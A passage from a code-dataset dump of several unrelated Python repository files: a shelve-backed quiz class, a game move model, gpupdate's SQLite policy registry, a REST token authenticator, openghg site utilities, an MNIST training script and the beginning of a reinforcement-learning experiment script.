all Quiz objects MUST inherit from.\n \"\"\"\n def __init__(self):\n self.ended = False\n\n @classmethod\n def create_new(cls, shelve):\n \"\"\"\n Create new instance of `cls` and save in shelve.\n\n :param shelve: The open shelve (file) from flask-shelves.\n\n :returns: The Quiz instance's ID.\n \"\"\"\n return cls().save(shelve)\n\n @staticmethod\n def get_instance(shelve, id_):\n \"\"\"\n Get instance from the shelve file.\n\n :param shelve: The open shelve (file) from flask-shelves.\n :param id_: The Quiz instance's ID.\n\n :returns: Quiz instance.\n \"\"\"\n return shelve[SHELVE_INSTANCE_PREFIX + str(id_)]\n\n @classmethod\n def remove_instance(cls, shelve, id_):\n \"\"\"\n Remove instance from shelve file.\n\n :param shelve: The open shelve (file) from flask-shelve.\n :param id_: The Quiz instance's ID.\n \"\"\"\n cls.get_instance(shelve, id_).remove(shelve)\n\n def id(self, shelve):\n \"\"\"\n Find or create and claim ID for instance.\n\n :param shelve: The open shelve (file) from flask-shelve.\n\n :returns: The Quiz instance's ID.\n \"\"\"\n\n if hasattr(self, '_id'):\n return self._id\n \n new_id = str(uuid.uuid4())\n full_id = SHELVE_INSTANCE_PREFIX + new_id\n\n # If ID already used just generate another.\n if full_id in shelve:\n return self.id(shelve)\n\n # Claim the ID.\n shelve[full_id] = None\n \n # Save it for next time.\n self._id = new_id\n\n return new_id\n\n def save(self, shelve):\n \"\"\"\n Save instance to shelve file.\n\n :param shelve: The open shelve (file) from flask-shelve.\n\n :returns: The Quiz instance's ID.\n \"\"\"\n id_ = self.id(shelve)\n shelve[SHELVE_INSTANCE_PREFIX + id_] = self\n return id_\n\n def remove(self, shelve):\n \"\"\"\n Remove instance from shelve file.\n\n :param shelve: The open shelve (file) from flask-shelve.\n \"\"\"\n id_ = self.id(shelve)\n del shelve[SHELVE_INSTANCE_PREFIX + id_]\n\n","repo_name":"stlukey/Complexity","sub_path":"complexity/quizzes/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3454,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"33687513888","text":"from typing import Dict, Union\nfrom werkzeug.exceptions import BadRequest\n\nCOLUMN = \"column\"\nPLAYER = \"player\"\nTYPE = \"type\"\nMOVE = \"MOVE\"\nMoveAsDict = Dict[str, Union[str, int]]\n\n\nclass Move:\n def __init__(self, player: str, type_: str, column: int = None):\n self._validate(column, player, type_)\n\n self.type = type_\n self.player = player\n self.column = column\n\n def as_dict(self) -> MoveAsDict:\n return {\n TYPE: self.type,\n PLAYER: self.player,\n COLUMN: self.column\n }\n\n def _validate(self, column: int, player: str, type_: str):\n if type_ == MOVE and type(column) != int:\n raise BadRequest(\"Move failed: missing or invalid 'column'\")\n","repo_name":"Zerryth/drop_token","sub_path":"models/move.py","file_name":"move.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17185767974","text":"import os\n\nfrom sqlalchemy import (\n create_engine,\n Table,\n Column,\n Integer,\n String,\n MetaData,\n UniqueConstraint\n)\nfrom sqlalchemy.orm import (\n sessionmaker,\n registry as registry_alch\n)\n\nfrom util.logging import log\nfrom util.paths import cache_dir\nfrom .registry import registry\nfrom .record_types import (\n samba_preg\n , samba_hkcu_preg\n , ad_shortcut\n , info_entry\n , printer_entry\n , drive_entry\n , folder_entry\n , envvar_entry\n , script_entry\n , file_entry\n , ini_entry\n , networkshare_entry\n)\n\nclass sqlite_registry(registry):\n def __init__(self, db_name, registry_cache_dir=None):\n self.db_name = db_name\n cdir = registry_cache_dir\n if cdir == None:\n cdir = cache_dir()\n self.db_path = os.path.join('sqlite:///{}/{}.sqlite'.format(cdir, self.db_name))\n self.db_cnt = create_engine(self.db_path, echo=False)\n self.__metadata = MetaData()\n self.__info = Table(\n 'info',\n self.__metadata,\n Column('id', Integer, primary_key=True),\n Column('name', String(65536), unique=True),\n Column('value', String(65536))\n )\n self.__hklm = Table(\n 'HKLM'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('hive_key', String(65536, collation='NOCASE'),\n unique=True)\n , Column('keyname', String(collation='NOCASE'))\n , Column('valuename', String(collation='NOCASE'))\n , Column('policy_name', String)\n , Column('type', Integer)\n , Column('data', String)\n )\n self.__hkcu = Table(\n 'HKCU'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('hive_key', String(65536, collation='NOCASE'))\n , Column('keyname', String(collation='NOCASE'))\n , Column('valuename', String(collation='NOCASE'))\n , Column('policy_name', String)\n , Column('type', Integer)\n , Column('data', String)\n , UniqueConstraint('sid', 'hive_key')\n )\n self.__shortcuts = Table(\n 'Shortcuts'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('path', String)\n , Column('policy_name', String)\n , Column('shortcut', String)\n , UniqueConstraint('sid', 'path')\n )\n self.__printers = Table(\n 'Printers'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('name', String)\n , Column('policy_name', String)\n , Column('printer', String)\n , UniqueConstraint('sid', 'name')\n )\n self.__drives = Table(\n 'Drives'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('login', String)\n , Column('password', String)\n , Column('dir', String)\n , Column('policy_name', String)\n , Column('path', String)\n , Column('action', String)\n , Column('thisDrive', String)\n , Column('allDrives', String)\n , Column('label', String)\n , Column('persistent', String)\n , Column('useLetter', String)\n , UniqueConstraint('sid', 'dir')\n )\n self.__folders = Table(\n 'Folders'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('path', String)\n , Column('policy_name', String)\n , Column('action', String)\n , Column('delete_folder', String)\n , Column('delete_sub_folders', String)\n , Column('delete_files', String)\n , UniqueConstraint('sid', 'path')\n )\n self.__envvars = Table(\n 'Envvars'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('name', String)\n , Column('policy_name', String)\n , Column('action', String)\n , Column('value', String)\n , UniqueConstraint('sid', 'name')\n )\n self.__scripts = Table(\n 'Scripts'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('policy_name', String)\n , Column('number', String)\n , Column('action', String)\n , Column('path', String)\n , Column('arg', String)\n , UniqueConstraint('sid', 'path', 'arg')\n )\n self.__files = Table(\n 'Files'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('policy_name', String)\n , Column('action', String)\n , Column('fromPath', String)\n , Column('targetPath', String)\n , Column('readOnly', String)\n , Column('archive', String)\n , Column('hidden', String)\n , Column('suppress', String)\n , Column('executable', String)\n , UniqueConstraint('sid', 'policy_name', 'targetPath', 'fromPath')\n )\n self.__ini = Table(\n 'Ini'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('policy_name', String)\n , Column('action', String)\n , Column('path', String)\n , Column('section', String)\n , Column('property', String)\n , Column('value', String)\n , UniqueConstraint('sid', 'action', 'path', 'section', 'property', 'value')\n )\n self.__networkshare = Table(\n 'Networkshare'\n , self.__metadata\n , Column('id', Integer, primary_key=True)\n , Column('sid', String)\n , Column('policy_name', String)\n , Column('name', String)\n , Column('action', String)\n , Column('path', String)\n , Column('allRegular', String)\n , Column('comment', String)\n , Column('limitUsers', String)\n , Column('abe', String)\n , UniqueConstraint('sid', 'name', 'path')\n )\n\n self.__metadata.create_all(self.db_cnt)\n Session = sessionmaker(bind=self.db_cnt)\n self.db_session = Session()\n mapper_reg = registry_alch()\n try:\n mapper_reg.map_imperatively(info_entry, self.__info)\n mapper_reg.map_imperatively(samba_preg, self.__hklm)\n mapper_reg.map_imperatively(samba_hkcu_preg, self.__hkcu)\n mapper_reg.map_imperatively(ad_shortcut, self.__shortcuts)\n mapper_reg.map_imperatively(printer_entry, self.__printers)\n mapper_reg.map_imperatively(drive_entry, self.__drives)\n mapper_reg.map_imperatively(folder_entry, self.__folders)\n mapper_reg.map_imperatively(envvar_entry, self.__envvars)\n mapper_reg.map_imperatively(script_entry, self.__scripts)\n mapper_reg.map_imperatively(file_entry, self.__files)\n mapper_reg.map_imperatively(ini_entry, self.__ini)\n mapper_reg.map_imperatively(networkshare_entry, self.__networkshare)\n except:\n pass\n #logging.error('Error creating mapper')\n\n def _add(self, row):\n try:\n self.db_session.add(row)\n self.db_session.commit()\n except Exception as exc:\n self.db_session.rollback()\n raise exc\n\n def _info_upsert(self, row):\n try:\n self._add(row)\n except:\n (self\n .db_session.query(info_entry)\n .filter(info_entry.name == row.name)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def _hklm_upsert(self, row):\n try:\n self._add(row)\n except:\n (self\n .db_session\n .query(samba_preg)\n .filter(samba_preg.hive_key == row.hive_key)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def _hkcu_upsert(self, row):\n try:\n self._add(row)\n except Exception as exc:\n (self\n .db_session\n .query(samba_hkcu_preg)\n .filter(samba_hkcu_preg.sid == row.sid)\n .filter(samba_hkcu_preg.hive_key == row.hive_key)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def _shortcut_upsert(self, row):\n try:\n self._add(row)\n except:\n (self\n .db_session\n .query(ad_shortcut)\n .filter(ad_shortcut.sid == row.sid)\n .filter(ad_shortcut.path == row.path)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def _printer_upsert(self, row):\n try:\n self._add(row)\n except:\n (self\n .db_session\n .query(printer_entry)\n .filter(printer_entry.sid == row.sid)\n .filter(printer_entry.name == row.name)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def _drive_upsert(self, row):\n try:\n self._add(row)\n except:\n (self\n .db_session\n .query(drive_entry)\n .filter(drive_entry.sid == row.sid)\n .filter(drive_entry.dir == row.dir)\n .update(row.update_fields()))\n self.db_session.commit()\n\n def set_info(self, name, value):\n ientry = info_entry(name, value)\n logdata = dict()\n logdata['varname'] = name\n logdata['value'] = value\n log('D19', logdata)\n self._info_upsert(ientry)\n\n def _delete_hklm_keyname(self, keyname):\n '''\n Delete PReg hive_key from HKEY_LOCAL_MACHINE\n '''\n logdata = dict({'keyname': keyname})\n try:\n (self\n .db_session\n .query(samba_preg)\n .filter(samba_preg.keyname == keyname)\n .delete(synchronize_session=False))\n self.db_session.commit()\n log('D65', logdata)\n except Exception as exc:\n log('D63', logdata)\n\n def add_hklm_entry(self, preg_entry, policy_name):\n '''\n Write PReg entry to HKEY_LOCAL_MACHINE\n '''\n pentry = samba_preg(preg_entry, policy_name)\n if not pentry.valuename.startswith('**'):\n self._hklm_upsert(pentry)\n else:\n logdata = dict({'key': pentry.hive_key})\n if pentry.valuename.lower() == '**delvals.':\n self._delete_hklm_keyname(pentry.keyname)\n else:\n log('D27', logdata)\n\n def _delete_hkcu_keyname(self, keyname, sid):\n '''\n Delete PReg hive_key from HKEY_CURRENT_USER\n '''\n logdata = dict({'sid': sid, 'keyname': keyname})\n try:\n (self\n .db_session\n .query(samba_hkcu_preg)\n .filter(samba_hkcu_preg.sid == sid)\n .filter(samba_hkcu_preg.keyname == keyname)\n .delete(synchronize_session=False))\n self.db_session.commit()\n log('D66', logdata)\n except:\n log('D64', logdata)\n\n def add_hkcu_entry(self, preg_entry, sid, policy_name):\n '''\n Write PReg entry to HKEY_CURRENT_USER\n '''\n hkcu_pentry = samba_hkcu_preg(sid, preg_entry, policy_name)\n logdata = dict({'sid': sid, 'policy': policy_name, 'key': hkcu_pentry.hive_key})\n if not hkcu_pentry.valuename.startswith('**'):\n log('D26', logdata)\n self._hkcu_upsert(hkcu_pentry)\n else:\n if hkcu_pentry.valuename.lower() == '**delvals.':\n self._delete_hkcu_keyname(hkcu_pentry.keyname, sid)\n else:\n log('D51', logdata)\n\n def add_shortcut(self, sid, sc_obj, policy_name):\n '''\n Store shortcut information in the database\n '''\n sc_entry = ad_shortcut(sid, sc_obj, policy_name)\n logdata = dict()\n logdata['link'] = sc_entry.path\n logdata['sid'] = sid\n log('D41', logdata)\n self._shortcut_upsert(sc_entry)\n\n def add_printer(self, sid, pobj, policy_name):\n '''\n Store printer configuration in the database\n '''\n prn_entry = printer_entry(sid, pobj, policy_name)\n logdata = dict()\n logdata['printer'] = prn_entry.name\n logdata['sid'] = sid\n log('D40', logdata)\n self._printer_upsert(prn_entry)\n\n def add_drive(self, sid, dobj, policy_name):\n drv_entry = drive_entry(sid, dobj, policy_name)\n logdata = dict()\n logdata['uri'] = drv_entry.path\n logdata['sid'] = sid\n log('D39', logdata)\n self._drive_upsert(drv_entry)\n\n def add_folder(self, sid, fobj, policy_name):\n fld_entry = folder_entry(sid, fobj, policy_name)\n logdata = dict()\n logdata['folder'] = fld_entry.path\n logdata['sid'] = sid\n log('D42', logdata)\n try:\n self._add(fld_entry)\n except Exception as exc:\n (self\n ._filter_sid_obj(folder_entry, sid)\n .filter(folder_entry.path == fld_entry.path)\n .update(fld_entry.update_fields()))\n self.db_session.commit()\n\n def add_envvar(self, sid, evobj, policy_name):\n ev_entry = envvar_entry(sid, evobj, policy_name)\n logdata = dict()\n logdata['envvar'] = ev_entry.name\n logdata['sid'] = sid\n log('D53', logdata)\n try:\n self._add(ev_entry)\n except Exception as exc:\n (self\n ._filter_sid_obj(envvar_entry, sid)\n .filter(envvar_entry.name == ev_entry.name)\n .update(ev_entry.update_fields()))\n self.db_session.commit()\n def add_script(self, sid, scrobj, policy_name):\n scr_entry = script_entry(sid, scrobj, policy_name)\n logdata = dict()\n logdata['script path'] = scrobj.path\n logdata['sid'] = sid\n log('D153', logdata)\n try:\n self._add(scr_entry)\n except Exception as exc:\n (self\n ._filter_sid_obj(script_entry, sid)\n .filter(script_entry.path == scr_entry.path)\n .update(scr_entry.update_fields()))\n self.db_session.commit()\n\n def add_file(self, sid, fileobj, policy_name):\n f_entry = file_entry(sid, fileobj, policy_name)\n logdata = dict()\n logdata['targetPath'] = f_entry.targetPath\n logdata['fromPath'] = f_entry.fromPath\n log('D162', logdata)\n try:\n self._add(f_entry)\n except Exception as exc:\n (self\n ._filter_sid_obj(file_entry, sid)\n .filter(file_entry.targetPath == f_entry.targetPath)\n .update(f_entry.update_fields()))\n self.db_session.commit()\n\n\n def add_ini(self, sid, iniobj, policy_name):\n inientry = ini_entry(sid, iniobj, policy_name)\n logdata = dict()\n logdata['path'] = inientry.path\n logdata['action'] = inientry.action\n log('D177', logdata)\n try:\n self._add(inientry)\n except Exception as exc:\n (self\n ._filter_sid_obj(ini_entry, sid)\n .filter(ini_entry.path == inientry.path)\n .update(inientry.update_fields()))\n self.db_session.commit()\n\n def add_networkshare(self, sid, networkshareobj, policy_name):\n networkshareentry = networkshare_entry(sid, networkshareobj, policy_name)\n logdata = dict()\n logdata['name'] = networkshareentry.name\n logdata['path'] = networkshareentry.path\n logdata['action'] = networkshareentry.action\n log('D186', logdata)\n try:\n self._add(networkshareentry)\n except Exception as exc:\n (self\n ._filter_sid_obj(networkshare_entry, sid)\n .filter(networkshare_entry.path == networkshareentry.path)\n .update(networkshareentry.update_fields()))\n self.db_session.commit()\n\n\n def _filter_sid_obj(self, row_object, sid):\n res = (self\n .db_session\n .query(row_object)\n .filter(row_object.sid == sid))\n return res\n\n def _filter_sid_list(self, row_object, sid):\n res = (self\n .db_session\n .query(row_object)\n .filter(row_object.sid == sid)\n .order_by(row_object.id)\n .all())\n return res\n\n def get_shortcuts(self, sid):\n return self._filter_sid_list(ad_shortcut, sid)\n\n def get_printers(self, sid):\n return self._filter_sid_list(printer_entry, sid)\n\n def get_drives(self, sid):\n return self._filter_sid_list(drive_entry, sid)\n\n def get_folders(self, sid):\n return self._filter_sid_list(folder_entry, sid)\n\n def get_envvars(self, sid):\n return self._filter_sid_list(envvar_entry, sid)\n\n def _filter_scripts_list(self, row_object, sid, action):\n res = (self\n .db_session\n .query(row_object)\n .filter(row_object.sid == sid)\n .filter(row_object.action == action)\n .order_by(row_object.id)\n .all())\n return res\n\n def get_scripts(self, sid, action):\n return self._filter_scripts_list(script_entry, sid, action)\n\n def get_files(self, sid):\n return self._filter_sid_list(file_entry, sid)\n\n def get_networkshare(self, sid):\n return self._filter_sid_list(networkshare_entry, sid)\n\n def get_ini(self, sid):\n return self._filter_sid_list(ini_entry, sid)\n\n def get_hkcu_entry(self, sid, hive_key):\n res = (self\n .db_session\n .query(samba_hkcu_preg)\n .filter(samba_hkcu_preg.sid == sid)\n .filter(samba_hkcu_preg.hive_key == hive_key)\n .first())\n # Try to get the value from machine SID as a default if no option is set.\n if not res:\n machine_sid = self.get_info('machine_sid')\n res = self.db_session.query(samba_hkcu_preg).filter(samba_hkcu_preg.sid == machine_sid).filter(samba_hkcu_preg.hive_key == hive_key).first()\n return res\n\n def filter_hkcu_entries(self, sid, startswith):\n res = (self\n .db_session\n .query(samba_hkcu_preg)\n .filter(samba_hkcu_preg.sid == sid)\n .filter(samba_hkcu_preg.hive_key.like(startswith)))\n return res\n\n def get_info(self, name):\n res = (self\n .db_session\n .query(info_entry)\n .filter(info_entry.name == name)\n .first())\n return res.value\n\n def get_hklm_entry(self, hive_key):\n res = (self\n .db_session\n .query(samba_preg)\n .filter(samba_preg.hive_key == hive_key)\n .first())\n return res\n\n def filter_hklm_entries(self, startswith):\n res = (self\n .db_session\n .query(samba_preg)\n .filter(samba_preg.hive_key.like(startswith)))\n return res\n\n def wipe_user(self, sid):\n self._wipe_sid(samba_hkcu_preg, sid)\n self._wipe_sid(ad_shortcut, sid)\n self._wipe_sid(printer_entry, sid)\n self._wipe_sid(drive_entry, sid)\n self._wipe_sid(script_entry, sid)\n self._wipe_sid(file_entry, sid)\n self._wipe_sid(ini_entry, sid)\n self._wipe_sid(networkshare_entry, sid)\n\n def _wipe_sid(self, row_object, sid):\n (self\n .db_session\n .query(row_object)\n .filter(row_object.sid == sid)\n .delete())\n self.db_session.commit()\n\n def wipe_hklm(self):\n self.db_session.query(samba_preg).delete()\n self.db_session.commit()\n\n","repo_name":"altlinux/gpupdate","sub_path":"gpoa/storage/sqlite_registry.py","file_name":"sqlite_registry.py","file_ext":"py","file_size_in_byte":20523,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"37"} +{"seq_id":"33253229432","text":"# 认证权限\nfrom app01.models import UserToken\n\nfrom rest_framework.exceptions import AuthenticationFailed\nfrom rest_framework.authentication import BaseAuthentication\n# 导入这个base....是因为要有authenticate_header这方法,虽然没怎么用,但是得有。这样省的我们自己写\n\nclass UserAuth(BaseAuthentication):\n def authenticate(self, request):\n token = request.query_params.get(\"token\")\n usertoken = UserToken.objects.filter(token=token).first()\n if usertoken:\n return usertoken.user,usertoken\n else:\n raise AuthenticationFailed(\"认证失败啦!!!\")","repo_name":"lllmy/drfdemo","sub_path":"DRF/app01/utils/auth_class.py","file_name":"auth_class.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69947802349","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 24 21:54:52 2020\n\n@author: hihyun\n\"\"\"\n\nnum=int(input())\nc=list(map(int,input().split()))\n\ncount=0\nwhile sorted(c)!=c and len(c)>3:\n c.remove(min(c))\n c.remove(max(c))\n count+=1\nif len(c)==0 or len(c)>3:\n print(count*2)\nelse:\n print(count*2+1)\n","repo_name":"hyeinhyun/alg_prac","sub_path":"boj/7570.py","file_name":"7570.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23690798698","text":"\"\"\" Utility functions that are used by multiple modules\n\n\"\"\"\nfrom collections.abc import Iterable\nfrom typing import Any, Dict, Iterator, Optional, Tuple\n\n\ndef running_in_cloud() -> bool:\n \"\"\"Are we running in the cloud?\n\n Checks for the OPENGHG_CLOUD environment variable being set\n\n Returns:\n bool: True if running in cloud\n \"\"\"\n from os import environ\n\n cloud_env = environ.get(\"OPENGHG_CLOUD\", \"0\")\n\n return bool(int(cloud_env))\n\n\ndef running_on_hub() -> bool:\n \"\"\"Are we running on the OpenGHG Hub?\n\n Checks for the OPENGHG_CLOUD environment variable being set\n\n Returns:\n bool: True if running in cloud\n \"\"\"\n from os import environ\n\n hub_env = environ.get(\"OPENGHG_HUB\", \"0\")\n\n return bool(int(hub_env))\n\n\ndef running_locally() -> bool:\n \"\"\"Are we running OpenGHG locally?\n\n Returns:\n bool: True if running locally\n \"\"\"\n return not (running_on_hub() or running_in_cloud())\n\n\ndef unanimous(seq: Dict) -> bool:\n \"\"\"Checks that all values in an iterable object\n are the same\n\n Args:\n seq: Iterable object\n Returns\n bool: True if all values are the same\n\n \"\"\"\n it = iter(seq.values())\n try:\n first = next(it)\n except StopIteration:\n return True\n else:\n return all(i == first for i in it)\n\n\ndef pairwise(iterable: Iterable) -> Iterator[Tuple[Any, Any]]:\n \"\"\"Return a zip of an iterable where a is the iterable\n and b is the iterable advanced one step.\n\n Args:\n iterable: Any iterable type\n Returns:\n tuple: Tuple of iterables\n \"\"\"\n from itertools import tee\n\n a, b = tee(iterable)\n next(b, None)\n\n return zip(a, b)\n\n\ndef site_code_finder(site_name: str) -> Optional[str]:\n \"\"\"Find the site code for a given site name.\n\n Args:\n site_name: Site long name\n Returns:\n str or None: Three letter site code if found\n \"\"\"\n from openghg.util import load_json\n from rapidfuzz import process # type: ignore\n\n sites = load_json(\"site_lookup.json\")\n\n inverted = {s[\"short_name\"]: c for c, s in sites.items()}\n\n matches = process.extract(query=site_name, choices=inverted.keys())\n highest_score = matches[0][1]\n\n if highest_score < 90:\n return None\n\n matched_site = matches[0][0]\n site_code: str = inverted[matched_site]\n\n return site_code\n\n\ndef find_matching_site(site_name: str, possible_sites: Dict) -> str:\n \"\"\"Try and find a similar name to site_name in site_list and return a suggestion or\n error string.\n\n Args:\n site_name: Name of site\n site_list: List of sites to check\n Returns:\n str: Suggestion / error message\n \"\"\"\n from rapidfuzz import process\n\n site_list = possible_sites.keys()\n\n matches = process.extract(site_name, site_list)\n\n scores = [s for m, s, _ in matches]\n\n # This seems like a decent cutoff score for a decent find\n cutoff_score = 85\n\n if scores[0] < cutoff_score:\n return f\"No suggestion for {site_name}.\"\n elif scores[0] > cutoff_score and scores[0] > scores[1]:\n best_match = matches[0][0]\n return f\"Did you mean {best_match.upper()}, code: {possible_sites[best_match]} ?\"\n elif scores[0] == scores[1]:\n suggestions = [f\"{match.title()}, code: {possible_sites[match]}\" for match, _, _ in matches]\n nl_char = \"\\n\"\n return f\"Did you mean one of : \\n {nl_char.join(suggestions)}\"\n else:\n return f\"Unknown site: {site_name}\"\n\n\ndef verify_site(site: str) -> str:\n \"\"\"Check if the passed site is a valid one and returns the three\n letter site code if found. Otherwise we use fuzzy text matching to suggest\n sites with similar names.\n\n Args:\n site: Three letter site code or site name\n Returns:\n str: Verified three letter site code if valid site\n \"\"\"\n from openghg.types import InvalidSiteError\n from openghg.util import load_json, remove_punctuation\n\n site_data = load_json(\"site_lookup.json\")\n\n if site.upper() in site_data:\n return site.lower()\n else:\n site = remove_punctuation(site)\n name_lookup: Dict[str, str] = {value[\"short_name\"]: code for code, value in site_data.items()}\n\n try:\n return name_lookup[site].lower()\n except KeyError:\n long_names = {value[\"long_name\"]: code for code, value in site_data.items()}\n message = find_matching_site(site_name=site, possible_sites=long_names)\n raise InvalidSiteError(message)\n\n\ndef multiple_inlets(site: str) -> bool:\n \"\"\"Check if the passed site has more than one inlet\n\n Args:\n site: Three letter site code\n Returns:\n bool: True if multiple inlets\n \"\"\"\n from openghg.util import load_json\n\n site_data = load_json(\"site_info.json\")\n\n site = site.upper()\n network = next(iter(site_data[site]))\n\n try:\n heights = set(site_data[network][\"height\"])\n except KeyError:\n try:\n heights = set(site_data[network][\"height_name\"])\n except KeyError:\n return True\n\n return len(heights) > 1\n","repo_name":"abcj123cour/openghg","sub_path":"openghg/util/_util.py","file_name":"_util.py","file_ext":"py","file_size_in_byte":5112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"3916073392","text":"import argparse\nimport torch\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torch import nn\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nimport classifier\n\ndef main(args):\n input_dim = 28 * 28\n output_dim = 10\n\n transform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ])\n\n train_set = datasets.MNIST(\n root='./data', train=True, download=True, transform=transform\n )\n\n val_set = datasets.MNIST(\n root='./data', train=False, download=True, transform=transform\n )\n\n train_loader = torch.utils.data.DataLoader(train_set, batch_size=BATCH_SIZE, shuffle=True)\n val_loader = torch.utils.data.DataLoader(val_set, batch_size=len(val_set), shuffle=False)\n\n linear_model = classifier.LinearClassifier(input_dim, output_dim)\n\n criterion = nn.CrossEntropyLoss()\n optimizer = optim.SGD(linear_model.parameters(), lr=args.lr, momentum=args.momentum)\n\n for epoch in range(args.n_epochs):\n running_loss = 0.0\n for i, data in enumerate(train_loader, 0):\n # get the inputs; data is a list of [inputs, labels]\n inputs, labels = data\n\n inputs = Variable(inputs.view(-1, IN))\n labels = Variable(labels)\n\n # zero the parameter gradients\n optimizer.zero_grad()\n outputs = linear_model(inputs)\n loss = criterion(outputs, labels)\n loss.backward()\n optimizer.step()\n\n # print statistics\n running_loss += loss.item()\n\n '''\n if i % 100 == 99: # print every 2000 mini-batches\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i + 1, running_loss / 100))\n running_loss = 0.\n '''\n\n else:\n '''\n print('[%d, %5d] loss: %.3f' %\n (epoch + 1, i, running_loss / (i % 100)))\n '''\n\n linear_model.eval()\n\n with torch.no_grad():\n val_loss = 0.0\n val_corrects = 0\n for i, data in enumerate(val_loader, 0):\n inputs, labels = data\n\n inputs = Variable(inputs.view(-1, IN))\n labels = Variable(labels)\n\n outputs = linear_model(inputs)\n _, preds = torch.max(outputs, 1)\n loss = criterion(outputs, labels)\n val_loss += criterion(outputs, labels).item() # sum up batch loss\n val_corrects += torch.sum(preds == labels.data)\n\n # pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability\n # correct += pred.eq(target.view_as(pred)).sum().item()\n\n epoch_loss = val_loss / (i + 1)\n epoch_acc = val_corrects.double() / len(val_set)\n\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(\n 'val', epoch_loss, epoch_acc))\n\n\n\n\n print('Finished Training')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='PyTorch MNIST')\n parser.add_argument('--batch_size', type=int, default=128, metavar='N',\n help='input batch size for training (default: 128)')\n parser.add_argument('--n_epochs', type=int, default=10, metavar='N',\n help='number of epochs to train (default: 10)')\n parser.add_argument('--lr', type=float, default=0.001, metavar='LR',\n help='learning rate (default: 1.0)')\n parser.add_argument('--momentum', type=float, default=0.9, metavar='M',\n help='learning rate (default: 1.0)')\n parser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\n parser.add_argument('--save-model', action='store_true', default=True,\n help='For Saving the current Model')\n args = parser.parse_args()\n\n main(args)\n\n","repo_name":"ozctimoti/MNIST_Convolution","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39310194926","text":"import sys\nimport os\nimport numpy as np\nfrom matplotlib import pyplot as plt\nsource_path = os.path.join(\"source/\")\nsys.path.insert(0,source_path)\nimport excursions # pylint: disable = import-error\nimport algorithms # pylint: disable = import-error\nimport tables # pylint: disable = import-error\n\nenvironment_parameters = dict(\n\ttrajectory_length = 100, \n\tpositivity_bias = 5,\n\ttarget_bias = 7,\n)\n\ngauge = excursions.gauge(environment_parameters)\nprint(gauge.max_return)\nprint(gauge.max_ent_return)\nprint()\n\nenvironment = excursions.environment(environment_parameters)\nsuccess_learning_rate = 0.003\nentropy_learning_rate = 0.01\nanalyser1 = excursions.analysis(success_learning_rate, entropy_learning_rate)\nanalyser2 = excursions.analysis(success_learning_rate, entropy_learning_rate)\nanalyser3 = excursions.analysis(success_learning_rate, entropy_learning_rate)\n\ntable_dimension = (environment_parameters['trajectory_length']*2 + 1, \n\t\t\t\t environment_parameters['trajectory_length'] + 1)\npolicy1 = tables.two_action_policy_table(table_dimension, 0.05)\nvalues2 = tables.value_table(table_dimension, 0.3)\npolicy2 = tables.two_action_policy_table(table_dimension, 0.05)\nvalues3 = tables.value_table(table_dimension, 0.3)\npolicy3 = tables.two_action_policy_table(table_dimension, 0.15)\n\nalgorithm_parameters1 = dict(\n\tenvironment = environment, \n\treturn_learning_rate = 0.1,\n\tpolicy = policy1,\n\tanalyser = analyser1,\n)\nalgorithm_parameters2 = dict(\n\tenvironment = environment, \n\treturn_learning_rate = 0.1,\n\tvalues = values2,\n\tpolicy = policy2,\n\tanalyser = analyser2,\n)\nalgorithm_parameters3 = dict(\n\tenvironment = environment, \n\treturn_learning_rate = 0.1,\n\tvalues = values3,\n\tpolicy = policy3,\n\tanalyser = analyser3,\n)\nagent1 = algorithms.kl_regularized_monte_carlo_returns(algorithm_parameters1)\nagent2 = algorithms.kl_regularized_monte_carlo_value_baseline(algorithm_parameters2)\nagent3 = algorithms.kl_regularized_actor_critic(algorithm_parameters3)\n\n\nagent1.evaluate(10000)\ninitial_return = agent1.average_return\ninitial_success = agent1.analyser.average_success\ninitial_entropy = agent1.analyser.average_entropy\nagent2.average_return = initial_return\nagent3.average_return = initial_return\nagent2.analyser.average_success = initial_success\nagent3.analyser.average_success = initial_success\nagent2.analyser.average_entropy = 